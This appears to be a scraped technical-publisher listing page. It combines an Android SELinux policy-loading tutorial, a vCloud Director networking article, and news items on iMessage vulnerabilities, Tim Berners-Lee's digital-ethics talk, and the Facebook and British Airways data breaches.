/sys/fs/selinux selinuxfs rw,relatime 0 0 SELinuxFS is an important filesystem as it provides the interface between the kernel and userspace for controlling and manipulating SELinux. As such, it has to be mounted for the policy load to work. The policy load uses the filesystem to send the policy file bytes to the kernel. This happens in the selinux_android_load_policy() function: int selinux_android_load_policy(void) {   char *mnt = SELINUXMNT;   int rc;   rc = mount(SELINUXFS, mnt, SELINUXFS, 0, NULL);   if (rc < 0) {     if (errno == ENODEV) {       /* SELinux not enabled in kernel */       return -1;     }     if (errno == ENOENT) {       /* Fall back to legacy mountpoint. */       mnt = OLDSELINUXMNT;       rc = mkdir(mnt, 0755);       if (rc == -1 && errno != EEXIST) {         selinux_log(SELINUX_ERROR,”SELinux:           Could not mkdir:  %sn”,         strerror(errno));         return -1;       }       rc = mount(SELINUXFS, mnt, SELINUXFS, 0, NULL);     }   }   if (rc < 0) {     selinux_log(SELINUX_ERROR,”SELinux:  Could not mount selinuxfs:  %sn”,     strerror(errno));     return -1;   }   set_selinuxmnt(mnt);     return selinux_android_reload_policy(); } The set_selinuxmnt(car *mnt) function changes a global variable in libselinux so that other routines can find the location of this vital interface. From there it calls another helper function, selinux_android_reload_policy(), which is located in the same libselinux android.c file. It loops through an array of possible policy locations in priority order. This array is defined as follows: Static const char *const sepolicy_file[] = {   “/data/security/current/sepolicy”,   “/sepolicy”,   0 }; Since only the root filesystem is mounted, it chooses /sepolicy at this time. The other path is for dynamic runtime reloads of policy. After acquiring a valid file descriptor to the policy file, the system is memory mapped into its address space, and calls security_load_policy(map, size) to load it to the kernel. This function is defined in load_policy.c. Here, the map parameter is the pointer to the beginning of the policy file, and the size parameter is the size of the file in bytes: int selinux_android_reload_policy(void) {   int fd = -1, rc;   struct stat sb;   void *map = NULL;   int i = 0;     while (fd < 0 && sepolicy_file[i]) {     fd = open(sepolicy_file[i], O_RDONLY | O_NOFOLLOW);     i++;   }   if (fd < 0) {     selinux_log(SELINUX_ERROR, “SELinux:  Could not open sepolicy:  %sn”,     strerror(errno));     return -1;   }   if (fstat(fd, &sb) < 0) {     selinux_log(SELINUX_ERROR, “SELinux:  Could not stat %s:  %sn”,     sepolicy_file[i], strerror(errno));     close(fd);     return -1;   }   map = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0);   if (map == MAP_FAILED) {     selinux_log(SELINUX_ERROR, “SELinux:  Could not map %s:  %sn”,     sepolicy_file[i], strerror(errno));     close(fd);     return -1;   }     rc = security_load_policy(map, sb.st_size);   if (rc < 0) {     selinux_log(SELINUX_ERROR, “SELinux:  Could not load policy:  %sn”,     strerror(errno));     munmap(map, sb.st_size);     close(fd);     return -1;   }     munmap(map, sb.st_size);   close(fd);   selinux_log(SELINUX_INFO, “SELinux: Loaded policy from %sn”, sepolicy_file[i]);     return 0; } The security load policy opens the <selinuxmnt>/load file, which in our case is /sys/fs/selinux/load. At this point, the policy is written to the kernel via this pseudo file: int security_load_policy(void *data, size_t len) {   char path[PATH_MAX];   int fd, ret;     if (!selinux_mnt) {     errno = ENOENT;     return -1;   }     snprintf(path, sizeof path, “%s/load”, selinux_mnt);   fd = open(path, O_RDWR);   if (fd < 0)   return -1;     ret = write(fd, data, len);   close(fd);   if (ret < 0)   return -1;   return 0; } Fixing the policy version At this point, we have a clear idea of how the policy is loaded into the kernel. This is very important. SELinux integration with Android began in Android 4.0, so when porting to various forks and fragments, this breaks, and code is often missing. Understanding all parts of the system, however cursory, will help us to correct issues as they appear in the wild and develop. This information is also useful to understand the system as a whole, so when modifications need to be made, you'll know where to look and how things work. At this point, we're ready to correct the policy versions. The logs and kernel config are clear; only policy versions up to 23 are supported, and we're trying to load policy version 26. This will probably be a common problem with Android considering kernels are often out of date. There is also an issue with the 4.3 sepolicy shipped by Google. Some changes by Google made it a bit more difficult to configure devices as they tailored the policy to meet their release goals. Essentially, the policy allows nearly everything and therefore generates very few denial logs. Some domains in the policy are completely permissive via a per-domain permissive statement, and those domains also have rules to allow everything so denial logs do not get generated. To correct this, we can use a more complete policy from the NSA. Replace external/sepolicy with the download from https://bitbucket.org/seandroid/external-sepolicy/get/seandroid-4.3.tar.bz2. After we extract the NSA's policy, we need to correct the policy version. The policy is located in external/sepolicy and is compiled with a tool called check_policy. The Android.mk file for sepolicy will have to pass this version number to the compiler, so we can adjust this here. On the top of the file, we find the culprit: ... # Must be <= /selinux/policyvers reported by the Android kernel. # Must be within the compatibility range reported by checkpolicy -V. POLICYVERS ?= 26 ... Since the variable is overridable by the ?= assignment. We can override this in BoardConfig.mk. Edit device/fsl/imx6/BoardConfigCommon.mk, adding the following POLICYVERS line to the bottom of the file: ... BOARD_FLASH_BLOCK_SIZE := 4096 TARGET_RECOVERY_UI_LIB := librecovery_ui_imx # SELinux Settings POLICYVERS := 23 -include device/google/gapps/gapps_config.mk Since the policy is on the boot.img image, build the policy and bootimage: $ mmm -B external/sepolicy/ $ make –j4 bootimage 2>&1 | tee logz !!!!!!!!! WARNING !!!!!!!!! VERIFY BLOCK DEVICE !!!!!!!!! $ sudo chmod 666 /dev/sdd1 $ dd if=$OUT/boot.img of=/dev/sdd1 bs=8192 conv=fsync Eject the SD card, place it into the UDOO, and boot. The first of the preceding commands should produce the following log output: out/host/linux-x86/bin/checkpolicy: writing binary representation (version 23) to out/target/product/udoo/obj/ETC/sepolicy_intermediates/sepolicy At this point, by checking the SELinux logs using dmesg, we can see the following: # dmesg | grep –i selinux <6>init: loading selinux policy <7>SELinux: 128 avtab hash slots, 490 rules. <7>SELinux: 128 avtab hash slots, 490 rules. <7>SELinux: 1 users, 2 roles, 274 types, 0 bools, 1 sens, 1024 cats <7>SELinux: 84 classes, 490 rules <7>SELinux: Completing initialization. Another command we need to run is getenforce. The getenforce command gets the SELinux enforcing status. It can be in one of three states: Disabled: No policy is loaded or there is no kernel support Permissive: Policy is loaded and the device logs denials (but is not in enforcing mode) Enforcing: This state is similar to the permissive state except that policy violations result in EACCESS being returned to userspace One of the goals while booting an SELinux system is to get to the enforcing state. Permissive is used for debugging, as follows: # getenforce Permissive Summary In this article, we covered the important policy load flow through the init process. We also changed the policy version to suit our development efforts and kernel version. From there, we were able to load the NSA policy and verify that the system loaded it. This article additionally showcased some of the SELinux APIs and their interactions with SELinuxFS. Resources for Article: Further resources on this subject: Android And Udoo Home Automation? [article] Sound Recorder For Android [article] Android Virtual Device Manager [article]
Read more
  • 0
  • 0
  • 2912

article-image-vcloud-networks
Packt
13 Sep 2013
14 min read
Save for later

vCloud Networks

Packt
13 Sep 2013
14 min read
(For more resources related to this topic, see here.) Basics Network Virtualization is what makes vCloud Director such an awesome tool. However, before we go full out in the next article, we need to set up the Network virtualization, and this is what we will be focusing on here. When we talk about isolated networks we are talking about vCloud director making use of different methods of Network Layer three encapsulation (OSI/ISO model). Basically it is the same concept as was introduced with VLANs. VLANs split up the network communication in physical network cables in different totally isolated communication streams. vCloud makes use of these isolated networks to create isolated Org and vApp Networks. VCloud Director has three different Network items: An external network is a network that exists outside the vCloud, for example, a production network. It is basically a PortGroup in vSphere that is used in vCloud to connect to the outside world. An External Network can be connected to multiple Organization Networks. External Networks are not virtualized and are based on existing PortGroups on a vSwitch or Distributed vSwitch. An organization network (Org Net) is a network that exists only inside one organization. You can have multiple Org Nets in an organization. Organizational Networks come in three different shapes: Isolated: An isolated Org Net exists only in this organization and is not connected to an external network; however, it can be connected to vApp networks or VMs. This network type uses network virtualization and its own Network setting. Routed Network (Edge Gateway): An Org Network connects to an existing Edge Device. An Edge Gateway allows defining firewall, NAT rules, as well as VPN connections and load balance functionality. Routed gateways connect external networks to vApp networks and/or VMs. This Network uses virtualized networks and its own Network setting. Directly connected: These Org Nets are an extension of an external network into the organization. They directly connect external networks to the vApp networks or VMs. These networks do NOT use network virtualization and they make use of the network settings of an External Network. A vApp network is a virtualized network that only exists inside a vApp. You can have multiple vApp networks inside one vApp. A vApp network can connect to VMs and to Org networks. It has its own network settings. When connecting a vApp Network to an Org Network you can create a Router between the vApp and the Org Network that lets you define DHCP, Firewall, NAT rules and Static Routing. To create isolated networks, vCloud Director uses Network Pools. Network pools are collection of VLANs, PortGroups and VLANs that can use L2 in L3 encapsulation. The content of these pools can be used by Org and vApp Networks for network virtualization. Network Pools There are four kinds of network pools that can be created: VXLAN: VXLAN networks are Layer 2 networks that are encapsulated in Layer 3 packages. VMware calls this Software Defined Networking (SDN). VXLANs are automatically created by vCD, however, they don't work out of the box and require some extra configuration in vCloud Network and Security (see later) Network isolation-backed: These are basically the same as VXLANs, however, they work out of the box and use Mac in Mac encapsulation. The difference is that VXLAN can transcend routers, network isolation-backed networks can't. vSphere Portgroups backed: vCD will use pre-created portgroups to build the vApp or organization networks. You need to pre-provision one portgroup for every vApp/Org network you would like to use. VLAN backed: vCD will use a pool of VLAN numbers to automatically provision portgroups on demand; however, you still need to configure the VLAN trunking. You will need to reserve one VLAN for every vApp/Org network you would like to use. VXLANs and network isolation networks solve the problems of pre-provisioning and reserving a multitude of VLANs, which makes them extremely important. However using PortGroup or VLAN Network Pools can have additional benefits that we will explore later. Types of vCloud Network VCloud Director has basically 3 different Network items. An external network is basically a PortGroup in vSphere that is imported into vCloud. An Org Network is an isolated network that exists only in an Organization. The same is true for vApp Network, they exist only in vApps. In the picture above you can see all possible connections. Let’s play through the scenarios and see how one can use them Isolated vApp Network An Isolated vApp network exist only inside a vApp. They are useful if one needs to test how VM’s behave in a network or to test using an IP range that is already in use (e.g. Production). The downside of them is that they are isolated, meaning it is hard to get information or software in and out. Have a look at the Recipe for RDP (or SSH) forward into an isolated vApp to find some answers to this problem. VMs directly connected to External Network VM’s inside a vApp are connected to a direct OrgNet, meaning they will be able to get IP’s from the External Network pool. Typically these VM’s are used for Production, meaning that customers choose vCloud for fast provisioning of predefined templates. As vCloud manages the IP’s for a given IP range it can be quite easy to fast provision a VM. vApp Network connected via vApp Router to External network VMs are connected to a vApp Network that has a vApp Router defined as its Gateway. The Gateway connects to a direct OrgNet, meaning that the Gateway will be automatically be given an IP from the External Network Pool. These configurations come in handy to reduce the amount of “physical” Networking that has to be done. The vApp Router can act as a Router with defined Firewall rules, it can do SNAT and DNAT as well as define static routing. So instead of using up a “physical” VLAN or SubNet, one can hide away applications this way. As an added benefit these Applications can be used as templates for fast deployment. VMs direct connected to isolated OrgNet VMs are connected directly to an isolated OrgNet. Connecting VMs directly to an Isolated Network normally only makes sense if there is more than one vApp/VM connected to the OrgNet. What they are used for is an extension of the isolated vApp concept. You need to test repeatedly complex Applications that require certain infrastructure like Active Directory, DHCP, DNS, Database, Exchange Servers etc. Instead of deploying large isolated vApps that contain these, you could deploy them in one vApp and connect them via an Isolated OrgNet directly to the vApp that contains your testing VMs. This makes it possible to reuse this base infrastructure. By using Sharing you even can hide away the Infrastructure vApp from your users. vApp connected via vApp Router to isolate OrgNet VMs are connected to an vApp network that has as its Gateway a vApp Router . The vApp router gets automatically its IP from the OrgNet Pool. Basically, a variant of the idea before. A test vApp or an infrastructure vApp can be packaged this way and be made ready for fast deployment. VMs connected directly to Edge VMs are directly connected to the Edge OrgNet and get their IP from the OrgNet Pool. Their Gateway is the Edge device that connects them to the External Networks through the Edge Firewall. A very typical setup is using the Edge Load balancing feature to load balance VM’s out of a vApp via the Edge. Another one is that the Organization is secured using the Edge Gateway against other Organizations that use the same External Network. This is mostly the case if the External Network is the internet and each Organization is an external customer. vApp connected to Edge via vApp Router VMs are connected to a vApp network that has the vApp router as its Gateway. The vApp Router will automatically get an IP form the OrgNet, which has its Gateway the Edge. This is a more complicated variant of the above scenario, allowing customers to package their VM’s, secure them against other vApps or VMs or subdivide their allocated networks. IP Management Let’s have a look into IP management with vCloud. vCloud knows about three different settings for IP management of VM’s. DHCP You need to provide a DHCP, vCloud doesn’t automatically create one. However a vApp Router or an Edge can create one. Static – IP Pool The IP for the VM comes from the Static IP Pool of the network it is connected to. In addition to that DNS and Domain Suffix will be written to the VM. Static – Manual The IP can be defined on the spot; however, it must be in the network defined by the Gateway and the Network mask of the network the VM is connected to. In addition to that, DNS and Domain Suffix will be written to the VM. All these settings require Guest Customization to be effective. If no Guest Customization is selected, it doesn’t work and whatever the VM was configured with as a Template will be used. vSphere and vCloud vApps One think that need to be said about vApps is that they actually come in two completely different versions. The vCenter vApp and the vCloud vApp. The vSphere vApp concept was introduced in vSphere 4.0 as a container for VMs. In vSphere a vApp is essentially a resource pool with some extras, such as starting and stopping order and (if you configured it) Network IP allocation method. The idea is it to have an entity of VMs that build one unit. Such vApp then can be exported or imported using the OVF format. A very good example for an vApp is VMware Operations Manager. It comes as a vApp in an OVF format and contains not only the VMs but also the start-up sequence as well as some setup script. When the vApp is deployed the first time, additional information like Network settings are asked and then implemented. As vSphere vApp is a resource pool, it can be configured so that it will only demand resources that it is using; on the other hand resource pool configuration is something that most people struggle with. A vSphere vApp is ONLY a resource pool, it is not automatically a folder in the Folder and Template View of vSphere, but is viewed there as again as a vApp. The vCloud vApp is a very different concept; first of all it is not a resource pool. The VMs of the vCloud vApp live in the OvDC resource Pool. However the vCloud vAppp is automatically a folder in the Folder and Template View of vSphere. It is a construct that is created by vCloud, it consists of VMs, a Start and Stop sequence and Networks. The Network part is one of the major differences (next to the resource pool). In vSphere only network information, like how IPs gets assigned to it and settings like Gateway and DNS are given to the vApp, a vCloud vApp actually encapsulates Networks. The vCloud vApp Networks are full networks, meaning they contain the full information for a given network including network settings and IP Pools. For more details see the last article. This information is kept when importing and exporting vCloud vApps. When I’m talking about vApps in the book, I will always mean vCloud vApps. vCenter vApp, if they feature will be written as vCenter vApp. Datastores, profiles and clusters I probably don’t have to explain what a datastore is, but here is a short intro just in case . A Datastore is a VMware object that exists in ESXi. This Object can be a hard disk that is attached to an ESXi server, a NFS or iSCSSI mount on a ESXi host or an fibre channel disk that is attached to an HBA on the ESXi server. A Storage Profile is a container that contains one or more Datastores. A Storage Profile doesn’t have any intelligence implemented, it just groups the Storage. However, it is extremely beneficial in vCloud. If you run out of storage on a datastore you can just add another datastore to the same Storage Profile and your back in business. Datastore Clusters again are containers for datastores, but now there is intelligence included. A Datastore Cluster can use Storage DRS, which allows for VMs to automatically use Storage vMotion to move from one datastore to another if the I/O latency is high or the storage low. Depending on your storage backend system this can be extremely useful. vCloud Director doesn’t know the difference between a Storage Profile and a Datastore Cluster. If you add a Datastore cluster, vCloud will pick it up as a Storage Profile, but that’s ok because it’s not a problem at all. Be aware that Storage profiles are part of the vSphere Enterprise Plus licensing. If you don’t have Enterprise Plus you won’t get storage profiles, and the only thing you can do in vCloud is use the storage profile ANY, which doesn’t contribute to productivity. Thin provisioning Thin Provisioning means that the file that contains the virtual hard disk (.vmdk) is only as big as the the amount of data written to the virtual hard disk.. As an example, if you have a 40GB hard disk attached to a Windows VM and have just installed Windows on it you are using around 2GB of the 40GB disk. When using Thin provisioning only 2GB will be written to the datastore not 40GB. If you don’t use thin provisioning the .vmdk file wil be 40GB big. If your storage vendors Storage APIs is integrated in your ESXi servers Thin Provisioning may be offloaded to your storage backend, making it even faster. Fast Provisioning Fast provisioning is similar to linked clones that you may know from Lab Manager or VMware View. However, in vCloud they are a bit more intelligent than in the other products. In the other products linked clones can NOT be deployed across different datastores but in vCloud they can. Let’s talk about how linked clones work. If you have a VM with a hard disk of 40GB and you clone that VM you would normally have to spend another 40GB (not using Thin Provisioning). Using Linked clones you will not need another 40GB but less. What happens in layman’s terms is that vCloud creates two snapshots of the original VM’s hard disk. A snapshot contains only the differences between the original and the Snapshot. The original hard disk (.vmdk file) is set to read-only and the first snapshot is connected to the original VM, so that one still can work with the original VM. The second snapshot is used to create the new VM. Using snapshots makes deploying a VM using Fast Provisioning not only Fast but it also saves a lot of disk space. The problem with this is that a snapshot must be on the same datastore as its source. So if you have a VM in one datastore, its linked clone cannot be in another. vCloud has solved that problem by deploying a Shadow VM. When you deploy a VM with Fast Provisioning onto a different datastore than its source, vCloud creates a full clone (a normal full copy) of the VM onto the new datastore and then creates a linked clone from the Shadow VM. If your storage vendors Storage APIs is integrated in your ESXi servers Fast Provisioning may be offloaded to your storage backend, making it faster. See also recipe “Making NFS based datastores faster”. Summary In this article, we saw vCloud networks, vSphere and vCloud vApps, and datastores, profiles and clusters. Resources for Article :   Further resources on this subject: Windows 8 with VMware View [Article] VMware View 5 Desktop Virtualization [Article] Cloning and Snapshots in VMware Workstation [Article]
Read more
  • 0
  • 0
  • 2894

article-image-google-project-zero-reveals-six-interactionless-bugs-that-can-affect-ios-via-apples-imessage
Savia Lobo
31 Jul 2019
3 min read
Save for later

Google Project Zero reveals six “interactionless” bugs that can affect iOS via Apple’s iMessage

Savia Lobo
31 Jul 2019
3 min read
Yesterday, two members of the Google Project Zero team revealed about six “interactionless” security bugs that can affect iOS by exploiting the iMessage Client. Four of these bugs can execute malicious code on a remote iOS device, without any prior user interaction. Apple released fixes for these bugs in the iOS 12.4 update on July 22. The two Project Zero researchers, Natalie Silvanovich and Samuel Groß, published details and demo proof-of-concept only for five out of the six vulnerabilities. Details of one of the "interactionless" vulnerabilities have been kept private because Apple's iOS 12.4 patch did not completely resolve the bug, according to Natalie Silvanovich. https://twitter.com/natashenka/status/1155941211275956226 4 bugs can perform an RCE via a malformed message Bugs with vulnerability IDs, CVE-2019-8647, CVE-2019-8660, CVE-2019-8662, CVE-2019-8641 (the one whose details are kept private), can execute malicious code on a remote iOS device. The attacker has to simply send a malformed message to the victim’s phone. Once the user opens the message and views it, the malicious code will automatically execute without the user knowing about it. 2 bugs can leak user’s on-device data to a remote device The other two bugs, CVE-2019-8624 and CVE-2019-8646, allow an attacker to leak data from a user’s device memory and read files off a remote device. This execution too can happen without the user knowing. “Apple's own notes about iOS 12.4 indicate that the unfixed flaw could give hackers a means to crash an app or execute commands of their own on recent iPhones, iPads and iPod Touches if they were able to discover it”, BBC reports. Silvanovich will talk about these remote and interactionless iPhone vulnerabilities at this year’s Black Hat security conference held at Las Vegas from August 3 - 8. An abstract of her talk reads, “There have been rumors of remote vulnerabilities requiring no user interaction being used to attack the iPhone, but limited information is available about the technical aspects of these attacks on modern devices.” Her presentation will explore “the remote, interaction-less attack surface of iOS. It discusses the potential for vulnerabilities in SMS, MMS, Visual Voicemail, iMessage and Mail, and explains how to set up tooling to test these components. It also includes two examples of vulnerabilities discovered using these methods." According to ZDNet, “When sold on the exploit market, vulnerabilities like these can bring a bug hunter well over $1 million, according to a price chart published by Zerodium. It wouldn't be an exaggeration to say that Silvanovich just published details about exploits worth well over $5 million, and most likely valued at around $10 million”. For iOS users who haven’t yet updated the latest version, it is advisable to install the iOS 12.4 release without any delay. Early this month, the Google Project Zero team revealed a bug in Apple’s iMessage that bricks iPhone causing a repetitive crash and respawn operations. This bug was patched in iOS 12.3 update. To know more about these five vulnerabilities in detail, visit the Google Project Zero bug report page. Stripe’s API degradation RCA found unforeseen interaction of database bugs and a config change led to cascading failure across critical services Azure DevOps report: How a bug caused ‘sqlite3 for Python’ to go missing from Linux images Is the Npm 6.9.1 bug a symptom of the organization’s cultural problems?
Read more
  • 0
  • 0
  • 2880
article-image-sir-tim-berners-lee-on-digital-ethics-and-socio-technical-systems-at-icdppc-2018
Sugandha Lahoti
25 Oct 2018
4 min read
Save for later

Sir Tim Berners-Lee on digital ethics and socio-technical systems at ICDPPC 2018

Sugandha Lahoti
25 Oct 2018
4 min read
At the ongoing 40th ICDPPC, International Conference of Data Protection and Privacy Commissioners conference, Sir Tim Berners-Lee spoke on ethics and the Internet. The ICDPPC conference which is taking place in Brussels this week brings together an international audience on digital ethics, a topic the European Data Protection Supervisor initiated in 2015. Some high profile speakers and their presentations include Giovanni Buttarelli, European Data Protection Supervisor on ‘Choose Humanity: Putting Dignity back into Digital’; Video interview with Guido Raimondi, President of the European Court of Human Rights; Tim Cook, CEO Apple on personal data and user privacy; ‘What is Ethics?’ by Anita Allen, Professor of Law and Professor of Philosophy, University of Pennsylvania among others. Per Techcrunch, Tim Berners-Lee has urged tech industries and experts to pay continuous attention to the world their software is consuming as they go about connecting humanity through technology. “Ethics, like technology, is design. As we’re designing the system, we’re designing society. Ethical rules that we choose to put in that design [impact the society]… Nothing is self-evident. Everything has to be put out there as something that we think will be a good idea as a component of our society.” he told the delegates present at the conference. He also described digital platforms as “socio-technical systems” — meaning “it’s not just about the technology when you click on the link it is about the motivation someone has, to make such a great thing and get excited just knowing that other people are reading the things that they have written”. “We must consciously decide on both of these, both the social side and the technical side,” he said. “The tech platforms are anthropogenic. They’re made by people. They’re coded by people. And the people who code them are constantly trying to figure out how to make them better.” According to Techcrunch, he also touched on the Cambridge Analytica data misuse scandal as an illustration of how sociotechnical systems are exploding simple notions of individual rights. “You data is being taken and mixed with that of millions of other people, billions of other people in fact, and then used to manipulate everybody. Privacy is not just about not wanting your own data to be exposed — it’s not just not wanting the pictures you took of yourself to be distributed publicly. But that is important too.” He also revealed new plans about his startup, Inrupt, which was launched last month to change the web for the better. His major goal with Inrupt is to decentralize the web and to get rid of gigantic tech monopolies’ (Facebook, Google, Amazon, etc) stronghold over user data. He hopes to achieve this with Inrupt’s new open source-project, Solid, a platform built using the existing web format. He explained that his platform can put people in control of their own data. The app, he explains, asks you where you want to put your data. So you can run your photo app or take pictures on your phone and say I want to store them on Dropbox, and I will store them on my own home computer. And it does this with a new technology which provides interoperability between any app and any store.” “The platform turns the privacy world upside down — or, I should say, it turns the privacy world right side up. You are in control of you data life… Wherever you store it you can control and get access to it.” He concluded saying that “We have to get commitments from companies to make their platforms constructive and we have to get commitments from governments to look at whenever they see that a new technology allows people to be taken advantage of, allows a new form of crime to get onto it by producing new forms of the law. And to make sure that the policies that they do are thought about in respect to every new technology as they come out.” The day before yesterday, The Public Voice Coalition, an organization that promotes public participation in decisions regarding the future of the Internet, came out with guidelines for AI, namely, Universal Guidelines on Artificial Intelligence at ICDPPC. Tim Berners-Lee plans to decentralize the web with ‘Solid’, an open-source project for “personal empowerment through data” EPIC’s Public Voice Coalition announces Universal Guidelines for Artificial Intelligence (UGAI) at ICDPPC 2018 California’s tough net neutrality bill passes state assembly vote.
Read more
  • 0
  • 0
  • 2870

article-image-facebook-witnesses-the-biggest-security-breach-since-cambridge-analytica-50m-accounts-compromised
Sugandha Lahoti
01 Oct 2018
4 min read
Save for later

Facebook’s largest security breach in its history leaves 50M user accounts compromised

Sugandha Lahoti
01 Oct 2018
4 min read
Facebook has been going through a massive decline of trust in recent times. And to make matters worse, it has witnessed another massive security breach, last week. On Friday, Facebook announced that nearly 50M Facebook accounts have been compromised by an attack that gave hackers the ability to take over users’ accounts. This security breach has not only affected user’s Facebook accounts but also impacted other accounts linked to Facebook. This means that a hacker could have accessed any account of yours that you log into using Facebook. This security issue was first discovered by Facebook on Tuesday, September 25. The hackers have apparently exploited a series of interactions between three bugs related to Facebook’s “View As” feature that lets people see what their own profile looks like to someone else. The hackers stole Facebook access tokens to take over people’s accounts. These tokens allow an attacker to take full control of the victim’s account, including logging into third-party applications that use Facebook Login. “I’m glad we found this and fixed the vulnerability,” Mark Zuckerberg said on a conference call with reporters on Friday morning. “But it definitely is an issue that this happened in the first place. I think this underscores the attacks that our community and our services face.” As of now, this vulnerability has been fixed and Facebook has contacted law enforcement authorities. The vice-president of product management, Guy Rosen, said that Facebook was working with the FBI, but he did not comment on whether national security agencies were involved in the investigation. As a security measure, Facebook has automatically logged out 90 million Facebook users from their accounts. These included the 50 million that Facebook knows were affected and an additional 40 million that potentially could have been. This attack exploited the complex interaction of multiple issues in Facebook code. It originated from a change made to Facebook’s video uploading feature in July 2017, which impacted “View As.” Facebook says that the affected users will get a message at the top of their News Feed about the issue when they log back into the social network. The message reads, "Your privacy and security are important to us, We want to let you know about recent action we've taken to secure your account." The message is followed by a prompt to click and learn more details. Facebook has also publicly apologized stating that, “People’s privacy and security is incredibly important, and we’re sorry this happened. It’s why we’ve taken immediate action to secure these accounts and let users know what happened.” This is not the end of misery for Facebook. Some users have also tweeted that they are unable to post Facebook’s security breach coverage from The Guardian and Associated Press. When trying to share the story to their news feed, they were met with the error message which prevented them from sharing the story. The error reads, “Our security systems have detected that a lot of people are posting the same content, which could mean that it’s spam. Please try a different post.” People have criticized Facebook’s automated content flagging tools. This is an example of how it tags legitimate content as illegitimate, calling it spam. It has also previously failed to detect harassment and hate speech. However, according to updates on Facebook’s Twitter account, the bug has now been resolved. https://twitter.com/facebook/status/1045796897506516992 The security breach comes at a time when the social media company is already facing multiple criticisms over issues such as foreign election interference, misinformation and hate speech, and data privacy. Recently, an Indie Taiwanese hacker also gained popularity with his plan to take down Mark Zuckerberg’s Facebook page and broadcast it live. However, soon he grew cold feet and said he’ll refrain from doing so after receiving global attention following his announcement. "I am canceling my live feed, I have reported the bug to Facebook and I will show proof when I get a bounty from Facebook," he told Bloomberg News. It’s high time that Facebook began taking it’s user privacy seriously, probably even going in the lines of rethinking it’s algorithm and platform entirely. They should also take responsibility for the real-world consequences of actions enabled by Facebook. How far will Facebook go to fix what it broke: Democracy, Trust, Reality. WhatsApp co-founder reveals why he left Facebook; is called ‘low class’ by a Facebook senior executive. Ex-employee on contract sues Facebook for not protecting content moderators from mental trauma
Read more
  • 0
  • 0
  • 2851

article-image-british-airways-set-to-face-a-record-breaking-fine-of-183m-by-the-ico-over-customer-data-breach
Sugandha Lahoti
08 Jul 2019
6 min read
Save for later

British Airways set to face a record-breaking fine of £183m by the ICO over customer data breach

Sugandha Lahoti
08 Jul 2019
6 min read
UK’s watchdog ICO is all set to fine British Airways more than £183m over a customer data breach. In September last year, British Airways notified ICO about a data breach that compromised personal identification information of over 500,000 customers and is believed to have begun in June 2018. ICO said in a statement, “Following an extensive investigation, the ICO has issued a notice of its intention to fine British Airways £183.39M for infringements of the General Data Protection Regulation (GDPR).” Information Commissioner Elizabeth Denham said, "People's personal data is just that - personal. When an organisation fails to protect it from loss, damage or theft, it is more than an inconvenience. That's why the law is clear - when you are entrusted with personal data, you must look after it. Those that don't will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights." How did the data breach occur? According to the details provided by the British Airways website, payments through its main website and mobile app were affected from 22:58 BST August 21, 2018, until 21:45 BST September 5, 2018. Per ICO’s investigation, user traffic from the British Airways site was being directed to a fraudulent site from where customer details were harvested by the attackers. Personal information compromised included log in, payment card, and travel booking details as well name and address information. The fraudulent site performed what is known as a supply chain attack embedding code from third-party suppliers to run payment authorisation, present ads or allow users to log into external services, etc. According to a cyber-security expert, Prof Alan Woodward at the University of Surrey, the British Airways hack may possibly have been a company insider who tampered with the website and app's code for malicious purposes. He also pointed out that live data was harvested on the site rather than stored data. https://twitter.com/EerkeBoiten/status/1148130739642413056 RiskIQ, a cyber security company based in San Francisco, linked the British Airways attack with the modus operandi of a threat group Magecart. Magecart injects scripts designed to steal sensitive data that consumers enter into online payment forms on e-commerce websites directly or through compromised third-party suppliers. Per RiskIQ, Magecart set up custom, targeted infrastructure to blend in with the British Airways website specifically and to avoid detection for as long as possible. What happens next for British Airways? The ICO noted that British Airways cooperated with its investigation, and has made security improvements since the breach was discovered. They now have 28 days to appeal. Responding to the news, British Airways’ chairman and chief executive Alex Cruz said that the company was “surprised and disappointed” by the ICO’s decision, and added that the company has found no evidence of fraudulent activity on accounts linked to the breach. He said, "British Airways responded quickly to a criminal act to steal customers' data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologise to our customers for any inconvenience this event caused." ICO was appointed as the lead supervisory authority to tackle this case on behalf of other EU Member State data protection authorities. Under the GDPR ‘one stop shop’ provisions the data protection authorities in the EU whose residents have been affected will also have the chance to comment on the ICO’s findings. The penalty is divided up between the other European data authorities, while the money that comes to the ICO goes directly to the Treasury. What is somewhat surprising is that ICO disclosed the fine publicly even before Supervisory Authorities commented on ICOs findings and a final decision has been taken based on their feedback, as pointed by Simon Hania. https://twitter.com/simonhania/status/1148145570961399808 Record breaking fine appreciated by experts The penalty imposed on British Airways is the first one to be made public since GDPR’s new policies about data privacy were introduced. GDPR makes it mandatory to report data security breaches to the information commissioner. They also increased the maximum penalty to 4% of turnover of the penalized company. The fine would be the largest the ICO has ever issued; last ICO fined Facebook £500,000 fine for the Cambridge Analytica scandal, which was the maximum under the 1998 Data Protection Act. The British Airways penalty amounts to 1.5% of its worldwide turnover in 2017, making it roughly 367 times than of Facebook’s. Infact, it could have been even worse if the maximum penalty was levied;  the full 4% of turnover would have meant a fine approaching £500m. Such a massive fine would clearly send a sudden shudder down the spine of any big corporation responsible for handling cybersecurity - if they compromise customers' data, a severe punishment is in order. https://twitter.com/j_opdenakker/status/1148145361799798785 Carl Gottlieb, Privacy Lead & Data Protection Officer at Duolingo has summarized the factoids of this attack in a twitter thread which were much appreciated. GDPR fines are for inappropriate security as opposed to getting breached. Breaches are a good pointer but are not themselves actionable. So organisations need to implement security that is appropriate for their size, means, risk and need. Security is an organisation's responsibility, whether you host IT yourself, outsource it or rely on someone else not getting hacked. The GDPR has teeth against anyone that messes up security, but clearly action will be greatest where the human impact is most significant. Threats of GDPR fines are what created change in privacy and security practices over the last 2 years (not orgs suddenly growing a conscience). And with very few fines so far, improvements have slowed, this will help. Monetary fines are a great example to change behaviour in others, but a TERRIBLE punishment to drive change in an affected organisation. Other enforcement measures, e.g. ceasing processing personal data (e.g. ban new signups) would be much more impactful. https://twitter.com/CarlGottlieb/status/1148119665257963521 Facebook fined $2.3 million by Germany for providing incomplete information about hate speech content European Union fined Google 1.49 billion euros for antitrust violations in online advertising French data regulator, CNIL imposes a fine of 50M euros against Google for failing to comply with GDPR.
Read more
  • 0
  • 0
  • 2837
article-image-google-bypassed-its-own-security-and-privacy-teams-for-project-dragonfly-reveals-intercept
Sugandha Lahoti
30 Nov 2018
5 min read
Save for later

Google bypassed its own security and privacy teams for Project Dragonfly reveals Intercept

Sugandha Lahoti
